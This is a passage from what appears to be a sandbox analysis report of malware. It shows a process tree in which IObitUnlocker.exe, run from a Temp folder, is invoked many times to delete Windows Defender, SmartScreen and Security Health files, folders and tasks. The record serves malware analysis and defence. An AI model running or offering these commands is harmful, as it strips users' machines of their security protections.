Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9184
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8324
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
